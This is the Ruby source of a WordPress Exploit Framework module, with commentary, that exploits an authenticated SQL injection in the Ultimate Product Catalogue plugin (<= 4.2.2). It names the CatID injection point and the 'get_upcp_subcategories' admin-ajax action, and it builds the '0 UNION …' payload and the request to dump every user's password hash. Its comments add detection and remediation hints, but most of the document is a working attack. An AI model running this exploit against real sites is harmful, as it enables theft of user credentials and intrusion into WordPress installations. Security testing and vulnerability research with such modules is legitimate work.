class Wpxf::Auxiliary::UltimateProductCatalogueHashDump


Calls superclass method Wpxf::WordPress::HashDump::new
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 6
# Registers the module's metadata with the framework.
#
# Runs the Wpxf::WordPress::HashDump initializer first so the generic
# hash-dump machinery is configured, then records name, description,
# credits, references and disclosure date through update_info.
#
# The description fixes the affected range (<= 4.2.2) and the privilege
# required (any account with at least subscriber status). For site owners
# the practical reading is that the flaw is reachable by low-privileged
# registered users and that upgrading past 4.2.2 removes it.
def initialize
  super

  # Credits and references are held in locals so the update_info call
  # below reads as a flat list of fields.
  credited = [
    'Lenon Leite', # Disclosure
    'rastating'    # WPXF module
  ]
  advisories = [
    ['WPVDB', '8853'],
    ['URL', 'http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/']
  ]

  update_info(
    name: 'Ultimate Product Catalogue <= 4.2.2 Authenticated Hash Dump',
    desc: %(
      Ultimate Product Catalogue <= 4.2.2 contains an SQL injection vulnerability
      which can be leveraged by all users with at least subscriber status. This
      module utilises this vulnerability to dump the hashed passwords of all
      users in the database.
    ),
    author: credited,
    references: advisories,
    date: 'Jun 26 2017'
  )
end


# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 29
# Reports whether the target runs a vulnerable build of the plugin.
#
# Delegates to the framework helper that inspects the plugin's readme.txt
# changelog. '4.2.3' is passed as the version that presumably closed the
# issue, so earlier builds would be flagged as vulnerable; the exact
# comparison semantics live in check_plugin_version_from_changelog, outside
# this file. For remediation purposes: 4.2.3 or later is the fixed release.
def check
  plugin_slug = 'ultimate-product-catalogue'
  fixed_version = '4.2.3'
  check_plugin_version_from_changelog(plugin_slug, 'readme.txt', fixed_version)
end
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 53
# Number of columns the injected UNION must supply.
#
# The value is consumed by the HashDump superclass when it builds the SQL
# statement (not visible in this file); presumably it has to match the
# column count of the plugin query that CatID feeds into — confirm against
# Wpxf::WordPress::HashDump.
#
# @return [Integer] 2
def hashdump_number_of_cols
  2
end
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 45
# Builds the POST body that carries the injection.
#
# The plugin's CatID field is the injection point: the leading "0" stands
# in for the integer the field presumably expects, and UNION appends the
# statement produced by hashdump_sql_statement (defined in the HashDump
# superclass, outside this file).
#
# Detection note: in a get_upcp_subcategories admin-ajax request the CatID
# value should be a plain integer; a value containing SQL keywords such as
# UNION is the observable artefact of this module and a reasonable WAF or
# log-alert condition.
#
# @return [Hash{String => String}] form fields for the POST body
def hashdump_request_body
  injected_value = "0 UNION #{hashdump_sql_statement}"
  { 'CatID' => injected_value }
end
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 37
# HTTP method used for the hash-dump request.
#
# The injected CatID value travels in the POST body (see
# hashdump_request_body), so the request is a POST to admin-ajax rather
# than a GET; log review for this issue should therefore look at request
# bodies, not just query strings.
#
# @return [Symbol] :post
def hashdump_request_method
  :post
end
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 41
# Request parameters selecting the vulnerable AJAX handler.
#
# 'action' names the WordPress admin-ajax action the plugin registers
# (get_upcp_subcategories); presumably these are sent as query-string
# parameters, with the injected CatID travelling separately in the POST
# body — confirm against the HashDump superclass. The action name is a
# useful pivot when hunting for exploitation attempts in access logs.
#
# @return [Hash{String => String}] the admin-ajax action selector
def hashdump_request_params
  ajax_action = 'get_upcp_subcategories'
  { 'action' => ajax_action }
end
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 49
# Index of the UNION column whose content is reflected in the response.
#
# Consumed by the HashDump superclass (outside this file); presumably the
# zero-based position, among the hashdump_number_of_cols columns, that the
# plugin echoes back to the caller — confirm against
# Wpxf::WordPress::HashDump.
#
# @return [Integer] 0
def hashdump_visible_field_index
  0
end
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 33
# Declares that the module needs a logged-in WordPress session.
#
# Consistent with the module description: the vulnerable handler is only
# reachable by users with at least subscriber status. For defenders this
# means open registration, or any compromised low-privilege account,
# is sufficient exposure on an unpatched site.
#
# @return [Boolean] true
def requires_authentication
  true
end
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 57
# URL the hash-dump request is sent to.
#
# Resolved through the framework helper wordpress_url_admin_ajax (outside
# this file), i.e. the site's admin-ajax endpoint; the specific plugin
# handler is selected by the 'action' parameter in hashdump_request_params.
#
# @return [String] the target's admin-ajax URL
def vulnerable_url
  wordpress_url_admin_ajax
end